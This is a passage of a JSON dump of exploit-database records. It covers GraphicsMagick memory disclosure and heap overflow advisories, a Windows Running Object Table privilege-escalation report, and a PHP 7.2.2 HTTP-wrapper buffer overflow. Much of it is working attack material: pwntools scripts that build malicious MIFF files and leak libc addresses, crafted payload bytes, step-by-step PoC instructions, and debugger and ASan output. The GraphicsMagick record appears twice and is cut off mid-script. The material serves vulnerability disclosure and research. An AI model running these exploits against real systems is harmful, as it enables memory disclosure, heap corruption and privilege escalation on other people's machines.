{\r\n...\r\n660 for (i=0; i < profile_length; )\r\n661 {\r\n662 if (profile[i] != 0x1c)\r\n663 {\r\n664 i++;\r\n665 continue;\r\n666 }\r\n667 i++; /* skip file separator */\r\n668 i++; /* skip record number */\r\n...\r\n725 i++;\r\n726 (void) fprintf(file,\" %.1024s:\\n\",tag);\r\n727 length=profile[i++] << 8;\r\n728 length|=profile[i++];\r\n729 text=MagickAllocateMemory(char *,length+1);\r\n730 if (text != (char *) NULL)\r\n731 {\r\n732 char\r\n733 **textlist;\r\n734\r\n735 register unsigned long\r\n736 j;\r\n737\r\n738 (void) strncpy(text,(char *) profile+i,length);\r\n739 text[length]='\\0';\r\n740 textlist=StringToList(text);\r\n741 if (textlist != (char **) NULL)\r\n742 {\r\n743 for (j=0; textlist[j] != (char *) NULL; j++)\r\n744 {\r\n745 (void) fprintf(file,\" %s\\n\",textlist[j]);\r\n...\r\n752 i+=length;\r\n753 }\r\n\r\n\r\nThe value in profile_length variable is set in the following field in the MIFF header: profile-iptc=8\r\n\r\nThere is an out-of-bounds buffer dereference whenever profile[i] is accessed because the increments of i is never checked.\r\n\r\nIf we break on line 738 of describe.c, we can explore what is present on the heap during the strncpy operation.\r\n\r\n\r\ngef\u27a4 x/2xg profile\r\n0x8be210: 0x08000a001c414141 0x00007ffff690fba8\r\n\r\n\r\nThe 8 bytes 0x08000a001c414141 is the profile payload present in the specially crafted MIFF file.\r\n\r\n\r\n41 41 41 - padding\r\n1C - sentinel check in line 662\r\n00 - padding\r\n0A - \"Priority\" tag\r\n08 00 - 8 in big endian, the length\r\n\r\n\r\nIf we examine the value 0x00007ffff690fba8 adjacent to the payload, it becomes apparent that it is an address within the main_arena struct in libc.\r\n\r\n\r\ngef\u27a4 x/xw 0x00007ffff690fba8\r\n0x7ffff690fba8 <main_arena+136>: 0x008cdc40\r\ngef\u27a4 vmmap libc\r\nStart End Offset Perm Path\r\n0x00007ffff654b000 0x00007ffff670b000 0x0000000000000000 r-x\r\n/lib/x86_64-linux-gnu/libc-2.23.so\r\n0x00007ffff670b000 0x00007ffff690b000 
0x00000000001c0000 ---\r\n/lib/x86_64-linux-gnu/libc-2.23.so\r\n0x00007ffff690b000 0x00007ffff690f000 0x00000000001c0000 r--\r\n/lib/x86_64-linux-gnu/libc-2.23.so\r\n0x00007ffff690f000 0x00007ffff6911000 0x00000000001c4000 rw-\r\n/lib/x86_64-linux-gnu/libc-2.23.so\r\n\r\nNow we can calculate the offset to libc base \u2013 0x3c4b98\r\n\r\nProof of Concept\r\n\r\n$ python miff/readexploit.py\r\n[+] Starting local process \u2018/usr/bin/gm\u2019: pid 20019\r\n[+] Receiving all data: Done (1.27KB)\r\n[*] Process \u2018/usr/bin/gm\u2019 stopped with exit code 0 (pid 20019)\r\n[*] Main Arena Leak: 0x7f72948adb98\r\n[*] libc Base: 0x7f72944e9000\r\n\r\n#!/usr/bin/python\r\n# GraphicsMagick IPTC Profile libc Leak\r\n \r\nfrom pwn import *\r\n \r\ndirectory = \"DIR\"\r\npartitions = ('id=ImageMagick version=1.0\\nclass=DirectClass matte=False\\n' +\r\n 'columns=1 rows=1 depth=16\\nscene=1\\nmontage=1x1+0+0\\nprofil' +\r\n 'e-iptc=',\r\n '\\n\\x0c\\n:\\x1a',\r\n '\\n\\x00',\r\n '\\n\\x00\\xbe\\xbe\\xbe\\xbe\\xbe\\xbe\\n')\r\noutput = \"readexploit.miff\"\r\nlength = 8\r\n \r\n#libc_main_arena_entry_offset = 0x3c4ba8\r\nlibc_main_arena_entry_offset = 0x3c4b98\r\n \r\ndef main():\r\n data = \"AAA\" + \"\\x1c\" + \"\\x00\" + chr(10) + p16(0x8, endian=\"big\")\r\n header = partitions[0] + str(length) + partitions[1]\r\n payload = header + directory + partitions[2] + data + partitions[3]\r\n file(output, \"w\").write(payload)\r\n \r\n p = process(executable=\"gm\", argv=[\"identify\", \"-verbose\", output])\r\n output_leak = p.recvall()\r\n priority_offset = output_leak.index(\"Priority:\") + 12\r\n montage_offset = output_leak.index(\"Montage:\") - 3\r\n leak = output_leak[priority_offset:montage_offset]\r\n if \"0x00000000\" in leak:\r\n log.info(\"Unlucky run. 
Value corrupted by StringToList\")\r\n exit()\r\n main_arena_leak = u64(leak.ljust(8, \"\\x00\"))\r\n log.info(\"Main Arena Leak: 0x%x\" % main_arena_leak)\r\n libc_base = main_arena_leak - libc_main_arena_entry_offset\r\n log.info(\"libc Base: 0x%x\" % libc_base)\r\n \r\nif __name__ == \"__main__\":\r\n main()\r\n\r\n \r\nHeap Overflow\r\nGraphicsMagick is vulnerable to a heap overflow vulnerability found in DescribeImage() function of the magick/describe.c file.\r\n\r\nThe call to strncpy on line 855 does not limit the size to be copied to the size of the buffer copied to. Instead, the size is calculated by searching for a newline or a null byte in the directory name.\r\n\r\n844 /*\r\n845 Display visual image directory.\r\n846 */\r\n847 image_info=CloneImageInfo((ImageInfo *) NULL);\r\n848 (void) CloneString(&image_info->size,\"64x64\");\r\n849 (void) fprintf(file,\" Directory:\\n\");\r\n850 for (p=image->directory; *p != '\\0'; p++)\r\n851 {\r\n852 q=p;\r\n853 while ((*q != '\\n') && (*q != '\\0'))\r\n854 q++;\r\n855 (void) strncpy(image_info->filename,p,q-p);\r\n856 image_info->filename[q-p]='\\0';\r\n857 p=q;\r\n...\r\n880 }\r\n881 DestroyImageInfo(image_info);\r\n\r\nSince the field filename in the ImageInfo struct has the static size of 2053, the heap can be corrupted by forging an overly long directory name.\r\n\r\n\r\ntype = struct _ImageInfo {\r\n...\r\n FILE *file;\r\n char magick[2053];\r\n char filename[2053];\r\n _CacheInfoPtr_ cache;\r\n void *definitions;\r\n Image *attributes;\r\n unsigned int ping;\r\n PreviewType preview_type;\r\n unsigned int affirm;\r\n _BlobInfoPtr_ blob;\r\n size_t length;\r\n char unique[2053];\r\n char zero[2053];\r\n unsigned long signature;\r\n}\r\n\r\nOne possible way to trigger the vulnerability is to run the identify command on a specially crafted MIFF format file with the verbose flag.\r\n\r\nProof of Concept\r\nThe following proof of concept script will generate a specially crafted MIFF file 
exploit.miff.\r\n'''\r\n\r\n#!/usr/bin/python\r\n \r\nfrom pwn import *\r\n \r\npartitions = ('id=ImageMagick version=1.0\\nclass=DirectClass matte=False\\n' +\r\n 'columns=1 rows=1 depth=16\\nscene=1\\nmontage=1x1+0+0\\n\\x0c\\n' +\r\n ':\\x1a',\r\n '\\n\\x00\\xbe\\xbe\\xbe\\xbe\\xbe\\xbe\\n')\r\noutput = \"exploit.miff\"\r\n \r\ndef main():\r\n payload = \"A\"*10000\r\n payload = partitions[0] + payload + partitions[1]\r\n file(output, \"w\").write(payload)\r\n \r\nif __name__ == \"__main__\":\r\n main()\r\n\r\n''' \r\nRunning the GraphicsMagick gm utility with the arguments identify -verbose in GDB and breaking after the vulnerable strncpy call, and examining the corrupted ImageInfo object demonstrates that the heap corruption was successful.\r\n\r\n\r\ngef\u27a4 r identify -verbose exploit.miff\r\n...\r\ngef\u27a4 br describe.c:856\r\nBreakpoint 1 at 0x4571df: file magick/describe.c, line 856.\r\n...\r\ngef\u27a4 p *image_info\r\n$3 = {\r\n...\r\n compression = UndefinedCompression,\r\n file = 0x0,\r\n magick = '\\000' <repeats 2052 times>,\r\n filename = 'A' <repeats 2053 times>,\r\n cache = 0x4141414141414141,\r\n definitions = 0x4141414141414141,\r\n attributes = 0x4141414141414141,\r\n ping = 0x41414141,\r\n preview_type = 1094795585,\r\n affirm = 0x41414141,\r\n blob = 0x4141414141414141,\r\n length = 0x4141414141414141,\r\n unique = 'A' <repeats 2053 times>,\r\n zero = 'A' <repeats 2053 times>,\r\n signature = 0x4141414141414141\r\n}\r\n'''", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://www.exploit-db.com/download/43111/"}, {"lastseen": "2017-05-17T16:49:36", "bulletinFamily": "exploit", "description": "Microsoft Windows - Running Object Table Register ROTFLAGS_ALLOWANYCLIENT Privilege Escalation. CVE-2017-0214. Dos exploit for Windows platform. 
Tags: Denial...", "modified": "2017-05-17T00:00:00", "published": "2017-05-17T00:00:00", "id": "EDB-ID:42021", "href": "https://www.exploit-db.com/exploits/42021/", "type": "exploitdb", "title": "Microsoft Windows - Running Object Table Register ROTFLAGS_ALLOWANYCLIENT Privilege Escalation", "sourceData": "Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1112\r\n\r\nWindows: Running Object Table Register ROTFLAGS_ALLOWANYCLIENT EoP\r\nPlatform: Windows 10 10586/14393 not tested 8.1 Update 2 or Windows 7\r\nClass: Elevation of Privilege\r\n\r\nSummary:\r\nBy setting an appropriate AppID it\u2019s possible for a normal user process to set a global ROT entry. This can be abused to elevate privileges.\r\n\r\nDescription:\r\n\r\nNOTE: I\u2019m not sure which part of this chain to really report. As far as I can tell it\u2019s pretty much all by design and fixing the initial vector seems difficult. Perhaps this is only a bug which can be fixed to prevent sandbox escapes?\r\n\r\nWhen registering an object in the ROT the default is to only expose that registration to the same user identity on the same desktop/window station. This includes preventing the same user at different ILs (such as between sandbox and normal user) from seeing the same registration. However it could be imagined that you might want to register an entry for all users/contexts so IRunningObjectTable::Register takes a grfFlags parameter with the value ROTFLAGS_ALLOWANYCLIENT which allows the ROT entry to be exposed to all users. \r\n\r\nThe description of this flag indicates it can only be used if the COM process is a Local Service or a RunAs application. In fact there\u2019s an explicit ROTFlags value for the AppID which would grant the privilege to a normal application. Quick testing proves this to be correct, a \u201cnormal\u201d application cannot expose the ROT entry to any client as RPCSS does a check that the calling process is allowed to expose the entry. 
However there are two clear problems with the check. Creating a RunAs COM object in the current session would typically run at the same privilege level as the caller, therefore an application which wanted to abuse this feature could inject code into that process. Secondly while it\u2019s not possible to register a per-user COM object which specifies a RunAs AppID it\u2019s possible to explicitly set the AppID when calling CoInitializeSecurity (either via the GUID or by naming your program to match one which maps to the correct AppID).\r\n\r\nTherefore in the current implementation effectively any process, including sandboxed ones should be able to register a global ROT entry. What can we do with this? The ROT is mainly used for OLE duties, for example Word and Visual Studio register entries for each document/project open. It would be nice not to rely on this, so instead I\u2019ll abuse another OLE component, which we\u2019ve seen before, the fact that LoadTypeLib will fall back to a moniker if it can\u2019t find the type library file specified.\r\n\r\nIf the file loading fails then LoadTypeLib will effectively call MkParseDisplayName on the passed in string. One of the things MPDN does is try and create a file moniker with the string passed in as an argument. File Monikers have an interesting feature, the COM libraries will check if there\u2019s a registered ROT entry for this file moniker already present, if it is instead of creating a new object it will call IRunningObjectTable::GetObject instead when binding. 
So as we can register a ROT entry for any user in any context we can provide our own implementation of ITypeLib running inside our process, by registering it against the path to the type library any other process which tries to open that library would instead get our spoofed one, assuming we can force the file open to fail.\r\n\r\nThis is the next key part, looking at the LoadTypeLib implementation the code calls FindTypeLib if this function fails the code will fall back to the moniker route. There\u2019s two opportunities here, firstly CreateFile is called on the path, we could cause this to fail by opening the file with no sharing mode, in theory it should fail. However in practice it doesn\u2019t most type libraries are in system location, if you don\u2019t have the possibility of write permission on the file the OS automatically applies FILE_SHARE_READ which makes it impossible to lock the file in its entirety. Also some TLBs are stored inside a DLL which is then used so this route is out. Instead the other route is more promising, VerifyIsExeOrTlb is called once the file is open to check the type of file to parse. This function tries to load the first 64 bytes and checks for magic signatures. We can cause the read to fail by using the LockFile API to put an exclusive lock on that part of the file. This also has the advantage that it doesn\u2019t affect file mappings so will also work with loaded DLLs. \r\n\r\nWe now can cause any user of a type library to get redirected to our \u201cfake\u201d one without abusing impersonation/symbolic link tricks. How can we use this to our advantage? The final trick is to abuse again the auto-generation of Stubs/Proxies from automation compatible interfaces. If we can get a more privileged process to use our type library when creating a COM stub we can cause a number of memory safety issues such as type confusion, arbitrary memory read/writes and extending the vtable to call arbitrary functions. 
This is an extremely powerful primitive, as long as you can find a more privileged process which uses a dual automation interface. For example the FlashBroker which is installed on every Win8+ machine is intentionally allowed to be created by sandboxed IE/Edge and uses dual interfaces with auto-generated Stubs. We could abuse for example the BrokerPrefSetExceptionDialogSize and BrokerPrefGetExceptionDialogSize to do arbitrary memory writes. This all works because the stub creation has no was of ensuring that the actual server implementation matches the generated stub (at least without full symbols) so it will blindly marshal pointers or call outside of the object's vtable.\r\n\r\nProof of Concept:\r\n\r\nI\u2019ve provided a PoC as a C# project. You need to compile it first. It fakes out the Windows Search Service\u2019s type library to modify the IGatherManagerAdmin2::GetBackoffReason method so that instead of marshaling a pointer to an integer for returning the caller can specify an arbitrary pointer value. When the method on the server side completes it will try and write a value to this address which will cause a Write AV. The Windows Search service would be ideal for abuse but many of the functions seem to require Administrator access to call. That\u2019s not to say you couldn\u2019t convert this into a full working exploit but I didn\u2019t.\r\n\r\n1) Compile the C# project. It should be compiled as a 64 bit executable.\r\n2) Restart the Windows Search service just to ensure it hasn\u2019t cached the stub previously. This probably isn\u2019t necessary but just to be certain.\r\n3) Attach a debugger to SearchIndexer.exe to catch the crash.\r\n4) Execute the PoC as a normal user (do not run under the VSHOST as the CoInitializeSecurity call will fail). 
You need to pass the path to the provided mssitlb.tlb file which has been modified appropriately.\r\n5) The service should crash trying to write a value to address 0x12345678\r\n\r\nCrash Dump:\r\n\r\n0:234> r\r\nrax=0000015ee04665a0 rbx=0000015ee0466658 rcx=0000015ee0466658\r\nrdx=0000000000000000 rsi=0000000000000004 rdi=0000000000000000\r\nrip=00007fff80e3a75d rsp=00000036541fdae0 rbp=00000036541fdb20\r\n r8=00000036541fd868 r9=0000015ee3bb50b0 r10=0000000000000000\r\nr11=0000000000000246 r12=0000015ee3c02988 r13=00000036541fe1c0\r\nr14=0000000012345678 r15=0000000000000000\r\niopl=0 nv up ei pl zr na po nc\r\ncs=0033 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010246\r\nMSSRCH!CGatheringManager::GetBackoffReason+0x8d:\r\n00007fff`80e3a75d 418936 mov dword ptr [r14],esi ds:00000000`12345678=????????\r\n0:234> k\r\n # Child-SP RetAddr Call Site\r\n00 00000036`541fdae0 00007fff`b416d533 MSSRCH!CGatheringManager::GetBackoffReason+0x8d\r\n01 00000036`541fdb10 00007fff`b413b0d0 RPCRT4!Invoke+0x73\r\n02 00000036`541fdb60 00007fff`b2fa479a RPCRT4!NdrStubCall2+0x430\r\n03 00000036`541fe180 00007fff`b3853c93 combase!CStdStubBuffer_Invoke+0x9a [d:\\th\\com\\combase\\ndr\\ndrole\\stub.cxx @ 1446]\r\n04 00000036`541fe1c0 00007fff`b305ccf2 OLEAUT32!CUnivStubWrapper::Invoke+0x53\r\n05 (Inline Function) --------`-------- combase!InvokeStubWithExceptionPolicyAndTracing::__l7::<lambda_b8ffcec6d47a5635f374132234a8dd15>::operator()+0x42 [d:\\th\\com\\combase\\dcomrem\\channelb.cxx @ 1805]\r\n06 00000036`541fe210 00007fff`b3001885 combase!ObjectMethodExceptionHandlingAction<<lambda_b8ffcec6d47a5635f374132234a8dd15> >+0x72 [d:\\th\\com\\combase\\dcomrem\\excepn.hxx @ 91]\r\n07 (Inline Function) --------`-------- combase!InvokeStubWithExceptionPolicyAndTracing+0x9e [d:\\th\\com\\combase\\dcomrem\\channelb.cxx @ 1808]\r\n08 00000036`541fe280 00007fff`b3006194 combase!DefaultStubInvoke+0x275 [d:\\th\\com\\combase\\dcomrem\\channelb.cxx @ 1880]\r\n09 (Inline Function) 
--------`-------- combase!SyncStubCall::Invoke+0x1b [d:\\th\\com\\combase\\dcomrem\\channelb.cxx @ 1934]\r\n0a (Inline Function) --------`-------- combase!SyncServerCall::StubInvoke+0x1b [d:\\th\\com\\combase\\dcomrem\\servercall.hpp @ 736]\r\n0b (Inline Function) --------`-------- combase!StubInvoke+0x297 [d:\\th\\com\\combase\\dcomrem\\channelb.cxx @ 2154]\r\n0c 00000036`541fe4a0 00007fff`b3008b47 combase!ServerCall::ContextInvoke+0x464 [d:\\th\\com\\combase\\dcomrem\\ctxchnl.cxx @ 1568]\r\n0d (Inline Function) --------`-------- combase!CServerChannel::ContextInvoke+0x83 [d:\\th\\com\\combase\\dcomrem\\ctxchnl.cxx @ 1458]\r\n0e (Inline Function) --------`-------- combase!DefaultInvokeInApartment+0x9e [d:\\th\\com\\combase\\dcomrem\\callctrl.cxx @ 3438]\r\n0f 00000036`541fe770 00007fff`b3007ccd combase!AppInvoke+0x8a7 [d:\\th\\com\\combase\\dcomrem\\channelb.cxx @ 1618]\r\n10 00000036`541fe8a0 00007fff`b300b654 combase!ComInvokeWithLockAndIPID+0xb2d [d:\\th\\com\\combase\\dcomrem\\channelb.cxx @ 2686]\r\n11 00000036`541feb30 00007fff`b40fd433 combase!ThreadInvoke+0x1724 [d:\\th\\com\\combase\\dcomrem\\channelb.cxx @ 6954]\r\n12 00000036`541fedc0 00007fff`b40fbed8 RPCRT4!DispatchToStubInCNoAvrf+0x33\r\n13 00000036`541fee10 00007fff`b40fcf04 RPCRT4!RPC_INTERFACE::DispatchToStubWorker+0x288\r\n14 00000036`541fef10 00007fff`b40f922d RPCRT4!RPC_INTERFACE::DispatchToStubWithObject+0x404\r\n15 00000036`541fefb0 00007fff`b40f9da9 RPCRT4!LRPC_SCALL::DispatchRequest+0x35d\r\n16 00000036`541ff090 00007fff`b40f64dc RPCRT4!LRPC_SCALL::HandleRequest+0x829\r\n17 00000036`541ff180 00007fff`b40f48c9 RPCRT4!LRPC_SASSOCIATION::HandleRequest+0x45c\r\n18 00000036`541ff200 00007fff`b411eaca RPCRT4!LRPC_ADDRESS::ProcessIO+0xb29\r\n19 00000036`541ff350 00007fff`b422e490 RPCRT4!LrpcIoComplete+0x10a\r\n1a 00000036`541ff3f0 00007fff`b422bc66 ntdll!TppAlpcpExecuteCallback+0x360\r\n1b 00000036`541ff4a0 00007fff`b34b8102 ntdll!TppWorkerThread+0x916\r\n1c 00000036`541ff8b0 00007fff`b425c5b4 
KERNEL32!BaseThreadInitThunk+0x22\r\n1d 00000036`541ff8e0 00000000`00000000 ntdll!RtlUserThreadStart+0x34\r\n\r\nExpected Result:\r\nNot doing what ever it did.\r\n\r\nObserved Result:\r\nIt did it!\r\n\r\n\r\nProof of Concept:\r\nhttps://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/42021.zip\r\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://www.exploit-db.com/download/42021/"}], "packetstorm": [{"lastseen": "2018-06-07T02:15:45", "bulletinFamily": "exploit", "description": "", "modified": "2018-06-06T00:00:00", "published": "2018-06-06T00:00:00", "id": "PACKETSTORM:148068", "href": "https://packetstormsecurity.com/files/148068/PHP-7.22-php_stream_url_wrap_http_ex-Buffer-Overflow.html", "title": "PHP 7.22 php_stream_url_wrap_http_ex Buffer Overflow", "type": "packetstorm", "sourceData": "`Description: \n------------ \nThe latest PHP distributions contain a memory corruption bug while parsing malformed HTTP response packets. Vulnerable code at: \n \nphp_stream_url_wrap_http_ex /home/weilei/php-7.2.2/ext/standard/http_fopen_wrapper.c:723 \n \nif (tmp_line[tmp_line_len - 1] == '\\n') { \n--tmp_line_len; \nif (tmp_line[tmp_line_len - 1] == '\\r') { \n--tmp_line_len; \n} \n} \n \nIf the proceeding buffer contains '\\r' as either controlled content or junk on stack, under a realistic setting (non-ASAN), tmp_line_len could go do -1, resulting in an extra large string being copied subsequently. Under ASAN a segfault can be observed. \n \n$ bin/php --version \nPHP 7.2.2 (cli) (built: Feb 20 2018 08:51:24) ( NTS ) \nCopyright (c) 1997-2018 The PHP Group \nZend Engine v3.2.0, Copyright (c) 1998-2018 Zend Technologies \n \n \nTest script: \n--------------- \n$ xxd -g 1 poc \n0000000: 30 30 30 30 30 30 30 30 30 31 30 30 0a 0a 000000000100.. 
\n \n$ nc -vvlp 8080 < poc \nListening on [0.0.0.0] (family 0, port 8080) \nConnection from [127.0.0.1] port 8080 [tcp/http-alt] accepted (family 2, sport 53083) \nGET / HTTP/1.0 \nHost: localhost:8080 \nConnection: close \n \n$ bin/php -r 'file_get_contents(\"http://localhost:8080\");' \n \nExpected result: \n---------------- \nNO CRASH \n \nActual result: \n-------------- \n$ bin/php -r 'file_get_contents(\"http://localhost:8080\");' \n================================================================= \n==26249== ERROR: AddressSanitizer: stack-buffer-overflow on address 0xbfc038ef at pc 0x8aa393b bp 0xbfc02eb8 sp 0xbfc02eac \nREAD of size 1 at 0xbfc038ef thread T0 \n#0 0x8aa393a in php_stream_url_wrap_http_ex /home/weilei/php-7.2.2/ext/standard/http_fopen_wrapper.c:723 \n#1 0x8aa61fb in php_stream_url_wrap_http /home/weilei/php-7.2.2/ext/standard/http_fopen_wrapper.c:979 \n#2 0x8b8b115 in _php_stream_open_wrapper_ex /home/weilei/php-7.2.2/main/streams/streams.c:2027 \n#3 0x8918dc0 in zif_file_get_contents /home/weilei/php-7.2.2/ext/standard/file.c:550 \n#4 0x867993a in phar_file_get_contents /home/weilei/php-7.2.2/ext/phar/func_interceptors.c:224 \n#5 0x91ee267 in ZEND_DO_ICALL_SPEC_RETVAL_UNUSED_HANDLER /home/weilei/php-7.2.2/Zend/zend_vm_execute.h:573 \n#6 0x91ee267 in execute_ex /home/weilei/php-7.2.2/Zend/zend_vm_execute.h:59731 \n#7 0x923c13c in zend_execute /home/weilei/php-7.2.2/Zend/zend_vm_execute.h:63760 \n#8 0x8cba975 in zend_eval_stringl /home/weilei/php-7.2.2/Zend/zend_execute_API.c:1082 \n#9 0x8cbaf66 in zend_eval_stringl_ex /home/weilei/php-7.2.2/Zend/zend_execute_API.c:1123 \n#10 0x8cbb06b in zend_eval_string_ex /home/weilei/php-7.2.2/Zend/zend_execute_API.c:1134 \n#11 0x9244455 in do_cli /home/weilei/php-7.2.2/sapi/cli/php_cli.c:1042 \n#12 0x9246b37 in main /home/weilei/php-7.2.2/sapi/cli/php_cli.c:1404 \n#13 0xb5e8ca82 (/lib/i386-linux-gnu/libc.so.6+0x19a82) \n#14 0x80656d0 in _start (/home/weilei/php7_asan/bin/php+0x80656d0) \nAddress 0xbfc038ef 
is located at offset 607 in frame <php_stream_url_wrap_http_ex> of T0's stack: \nThis frame has 13 object(s): \n[32, 36) 'transport_string' \n[96, 100) 'errstr' \n[160, 164) 'http_header_line_length' \n[224, 232) 'timeout' \n[288, 296) 'req_buf' \n[352, 360) 'tmpstr' \n[416, 432) 'ssl_proxy_peer_name' \n[480, 496) 'http_header' \n[544, 576) 'buf' \n[608, 736) 'tmp_line' \n[768, 1792) 'location' \n[1824, 2848) 'new_path' \n[2880, 3904) 'loc_path' \nHINT: this may be a false positive if your program uses some custom stack unwind mechanism or swapcontext \n(longjmp and C++ exceptions *are* supported) \nSUMMARY: AddressSanitizer: stack-buffer-overflow /home/weilei/php-7.2.2/ext/standard/http_fopen_wrapper.c:723 php_stream_url_wrap_http_ex \nShadow bytes around the buggy address: \n0x37f806c0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 \n0x37f806d0: 00 00 f1 f1 f1 f1 04 f4 f4 f4 f2 f2 f2 f2 04 f4 \n0x37f806e0: f4 f4 f2 f2 f2 f2 04 f4 f4 f4 f2 f2 f2 f2 00 f4 \n0x37f806f0: f4 f4 f2 f2 f2 f2 00 f4 f4 f4 f2 f2 f2 f2 00 f4 \n0x37f80700: f4 f4 f2 f2 f2 f2 00 00 f4 f4 f2 f2 f2 f2 00 00 \n=>0x37f80710: f4 f4 f2 f2 f2 f2 00 00 00 00 f2 f2 f2[f2]00 00 \n0x37f80720: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f2 f2 \n0x37f80730: f2 f2 00 00 00 00 00 00 00 00 00 00 00 00 00 00 \n0x37f80740: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 \n0x37f80750: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 \n0x37f80760: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 \nShadow byte legend (one shadow byte represents 8 application bytes): \nAddressable: 00 \nPartially addressable: 01 02 03 04 05 06 07 \nHeap left redzone: fa \nHeap righ redzone: fb \nFreed Heap region: fd \nStack left redzone: f1 \nStack mid redzone: f2 \nStack right redzone: f3 \nStack partial redzone: f4 \nStack after return: f5 \nStack use after scope: f8 \nGlobal redzone: f9 \nGlobal init order: f6 \nPoisoned by user: f7 \nASan internal: fe \n==26249== ABORTING \nAborted \n \n`\n", "cvss": {"score": 7.5, "vector": 
"AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://packetstormsecurity.com/files/download/148068/php722-overflow.txt"}, {"lastseen": "2017-11-05T20:00:04", "bulletinFamily": "exploit", "description": "", "modified": "2017-11-03T00:00:00", "published": "2017-11-03T00:00:00", "href": "https://packetstormsecurity.com/files/144878/GraphicsMagick-Memory-Disclosure-Heap-Overflow.html", "id": "PACKETSTORM:144878", "title": "GraphicsMagick Memory Disclosure / Heap Overflow", "type": "packetstorm", "sourceData": "`'''Vulnerabilities summary \nThe following advisory describes two (2) vulnerabilities found in GraphicsMagick. \n \nGraphicsMagick is \"The swiss army knife of image processing. Comprised of 267K physical lines (according to David A. Wheeler's SLOCCount) of source code in the base package (or 1,225K including 3rd party libraries) it provides a robust and efficient collection of tools and libraries which support reading, writing, and manipulating an image in over 88 major formats including important formats like DPX, GIF, JPEG, JPEG-2000, PNG, PDF, PNM, and TIFF.\" \n \nThe vulnerabilities found are: \n \nMemory Information Disclosure \nHeap Overflow \nCredit \nIndependent security researchers Jeremy Heng (@nn_amon) and Terry Chia (Ayrx) reported these vulnerabilities to Beyond Security's SecuriTeam Secure Disclosure program \n \nVendor response \nThe vendor has released patches to address these vulnerabilities (15237:e4e1c2a581d8 and 15238:7292230dd18). \n \nFor more details: ftp://ftp.graphicsmagick.org/pub/GraphicsMagick/snapshots/ChangeLog.txt \n \n \nVulnerabilities details \n \nMemory Information Disclosure \nGraphicsMagick is vulnerable to a memory information disclosure vulnerability found in the DescribeImage function of the magick/describe.c file. \n \nThe portion of the code containing the vulnerability is responsible for printing the IPTC Profile information contained in the image. 
\n \nThis vulnerability can be triggered with a specially crafted MIFF file. \n \nThe code which triggers the vulnerable code path is: \n \n63 MagickExport MagickPassFail DescribeImage(Image *image,FILE *file, \n64 const MagickBool verbose) \n65 { \n... \n660 for (i=0; i < profile_length; ) \n661 { \n662 if (profile[i] != 0x1c) \n663 { \n664 i++; \n665 continue; \n666 } \n667 i++; /* skip file separator */ \n668 i++; /* skip record number */ \n... \n725 i++; \n726 (void) fprintf(file,\" %.1024s:\\n\",tag); \n727 length=profile[i++] << 8; \n728 length|=profile[i++]; \n729 text=MagickAllocateMemory(char *,length+1); \n730 if (text != (char *) NULL) \n731 { \n732 char \n733 **textlist; \n734 \n735 register unsigned long \n736 j; \n737 \n738 (void) strncpy(text,(char *) profile+i,length); \n739 text[length]='\\0'; \n740 textlist=StringToList(text); \n741 if (textlist != (char **) NULL) \n742 { \n743 for (j=0; textlist[j] != (char *) NULL; j++) \n744 { \n745 (void) fprintf(file,\" %s\\n\",textlist[j]); \n... \n752 i+=length; \n753 } \n \n \nThe value in the profile_length variable is set by the following field in the MIFF header: profile-iptc=8 \n \nThere is an out-of-bounds buffer dereference whenever profile[i] is accessed, because the increments of i inside the loop body are never checked against profile_length. \n \nIf we break on line 738 of describe.c, we can explore what is present on the heap during the strncpy operation. \n \n \ngef➤ x/2xg profile \n0x8be210: 0x08000a001c414141 0x00007ffff690fba8 \n \n \nThe 8 bytes 0x08000a001c414141 are the profile payload present in the specially crafted MIFF file. \n \n \n41 41 41 - padding \n1C - sentinel check in line 662 \n00 - padding \n0A - \"Priority\" tag \n08 00 - 8 in big endian, the length \n \n \nIf we examine the value 0x00007ffff690fba8 adjacent to the payload, it becomes apparent that it is an address within the main_arena struct in libc. \n \n \ngef➤ x/xw 0x00007ffff690fba8 \n0x7ffff690fba8 <main_arena+136>: 0x008cdc40 \ngef➤ 
vmmap libc \nStart End Offset Perm Path \n0x00007ffff654b000 0x00007ffff670b000 0x0000000000000000 r-x \n/lib/x86_64-linux-gnu/libc-2.23.so \n0x00007ffff670b000 0x00007ffff690b000 0x00000000001c0000 --- \n/lib/x86_64-linux-gnu/libc-2.23.so \n0x00007ffff690b000 0x00007ffff690f000 0x00000000001c0000 r-- \n/lib/x86_64-linux-gnu/libc-2.23.so \n0x00007ffff690f000 0x00007ffff6911000 0x00000000001c4000 rw- \n/lib/x86_64-linux-gnu/libc-2.23.so \n \nNow we can calculate the offset to the libc base: 0x3c4b98 \n \nProof of Concept \n \n$ python miff/readexploit.py \n[+] Starting local process '/usr/bin/gm': pid 20019 \n[+] Receiving all data: Done (1.27KB) \n[*] Process '/usr/bin/gm' stopped with exit code 0 (pid 20019) \n[*] Main Arena Leak: 0x7f72948adb98 \n[*] libc Base: 0x7f72944e9000 \n \n#!/usr/bin/python \n# GraphicsMagick IPTC Profile libc Leak \n \nfrom pwn import * \n \ndirectory = \"DIR\" \npartitions = ('id=ImageMagick version=1.0\\nclass=DirectClass matte=False\\n' + \n'columns=1 rows=1 depth=16\\nscene=1\\nmontage=1x1+0+0\\nprofil' + \n'e-iptc=', \n'\\n\\x0c\\n:\\x1a', \n'\\n\\x00', \n'\\n\\x00\\xbe\\xbe\\xbe\\xbe\\xbe\\xbe\\n') \noutput = \"readexploit.miff\" \nlength = 8 \n \n#libc_main_arena_entry_offset = 0x3c4ba8 \nlibc_main_arena_entry_offset = 0x3c4b98 \n \ndef main(): \ndata = \"AAA\" + \"\\x1c\" + \"\\x00\" + chr(10) + p16(0x8, endian=\"big\") \nheader = partitions[0] + str(length) + partitions[1] \npayload = header + directory + partitions[2] + data + partitions[3] \nfile(output, \"w\").write(payload) \n \np = process(executable=\"gm\", argv=[\"identify\", \"-verbose\", output]) \noutput_leak = p.recvall() \npriority_offset = 